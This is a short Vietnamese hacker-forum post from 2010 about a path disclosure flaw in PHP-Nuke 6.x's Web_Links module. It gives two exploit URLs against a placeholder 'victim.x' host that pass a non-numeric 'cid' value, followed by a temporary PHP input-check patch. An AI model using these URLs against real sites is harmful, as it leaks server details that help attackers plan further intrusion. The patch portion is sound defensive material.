Hacker
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.


Forum Hacker Viet Nam
 
Trang ChínhLatest imagesTìm kiếmĐăng kýĐăng Nhập

 

 PhpNuke - Path Disclosure

Go down 
Tác giảThông điệp
hackervn1992

hackervn1992


Tổng số bài gửi : 200
Join date : 22/10/2010

PhpNuke - Path Disclosure Empty
Bài gửiTiêu đề: PhpNuke - Path Disclosure   PhpNuke - Path Disclosure EmptySat Oct 23, 2010 5:59 pm

Lỗi Path Disclosure ở PHP-Nuke 6.x, và những version khác?

Khai thác:

+http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words]
+http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink

Nếu [any_words] có một giá trị không thuộc số hay là một giá trị NULL, thì nó sẽ đưa ra "path disclosure".


Patch

(đây là temporal patch, nhưng... vẫn tốt)

Trong hàm viewlink chèn thêm code sau:
if(!isset($cid) || $cid == NULL || $cid == "" || !is_numeric ($cid))
{
echo "I don't like you >Neutral";
exit();
}

Về Đầu Trang Go down
 
PhpNuke - Path Disclosure
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Phpbb 2.0.5 Sql Injection Password, disclosure Exploit

Permissions in this forum:Bạn không có quyền trả lời bài viết
Hacker :: Security :: Hacker and Security-
Chuyển đến